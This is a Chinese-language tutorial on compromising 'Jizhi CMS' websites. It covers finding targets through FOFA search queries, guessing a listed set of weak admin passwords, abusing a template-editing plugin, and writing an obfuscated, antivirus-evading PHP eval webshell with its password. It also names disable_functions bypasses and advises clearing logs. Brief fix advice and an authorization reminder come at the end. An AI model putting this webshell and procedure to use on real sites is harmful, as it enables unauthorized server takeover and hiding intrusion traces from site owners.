记某CMS漏洞getshell
字数 962 2025-08-06 01:23:31
极致CMS漏洞利用与Getshell教学文档
一、漏洞概述
极致CMS存在多个安全漏洞,包括但不限于:
- 弱密码问题
- 后台插件管理功能中的代码编辑漏洞
- 文件上传限制绕过问题
- 前台文件上传Getshell漏洞
二、信息收集阶段
-
目标发现:
- 使用FOFA等网络空间搜索引擎搜索极致CMS站点
- 搜索语法示例:
title="极致CMS"或body="极致CMS"
-
后台发现:
- 在目标URL后添加
/admin.php访问后台登录页面
- 在目标URL后添加
三、弱密码利用
-
测试常见弱密码组合,如:
- admin/admin
- admin/123456
- admin/password
- admin/admin123
-
成功登录后台后,可进行进一步渗透测试
四、后台功能点测试
-
系统设置中的高级设置:
- 可修改上传文件的后缀名限制
- 但此功能主要影响前台上传
-
扩展管理功能:
- 重点测试"在线编辑模板"插件
- 该插件允许直接编辑PHP代码
五、插件漏洞利用
-
插件安装:
- 下载并安装"在线编辑模板"插件
- 安装时需要设置访问密码
- 插件目录权限设置为777(高权限)
-
代码编辑功能利用:
- 登录插件管理界面
- 可编辑现有PHP文件内容
- 插入恶意代码实现Getshell
六、Webshell写入
- 免杀小马示例:
<?php
$a = $GLOBALS;
$str = '_POST';
eval /**nice**/ ('' . $a[$str]['cf87efe0c36a12aec113cd7982043573'] . NULL);
?>
- 利用方法:
- 在现有PHP页面中插入上述代码
- 使用蚁剑等工具连接
- 密码为
cf87efe0c36a12aec113cd7982043573
七、绕过限制
-
Disable_functions绕过:
- 对于Linux系统,可使用蚁剑插件绕过
- 常见绕过技术包括LD_PRELOAD、PHP-FPM等
-
Windows系统限制:
- PHP 5.6环境
- 可能需要其他绕过技术
八、漏洞修复建议
- 修改默认密码,使用强密码策略
- 限制插件管理权限
- 对代码编辑功能增加严格过滤
- 合理设置文件系统权限
- 更新到最新版本CMS
九、渗透测试注意事项
- 测试前确保获得合法授权
- 操作过程中注意日志清理
- 测试完成后恢复修改的文件
- 遵守网络安全法律法规
十、扩展思考
- 可结合其他漏洞如SQL注入、XSS等进行综合利用
- 研究CMS其他插件可能存在的类似漏洞
- 探索提权可能性(如后续文章所述)
通过以上步骤,安全研究人员可以全面了解极致CMS的漏洞利用方法,并采取相应的防护措施。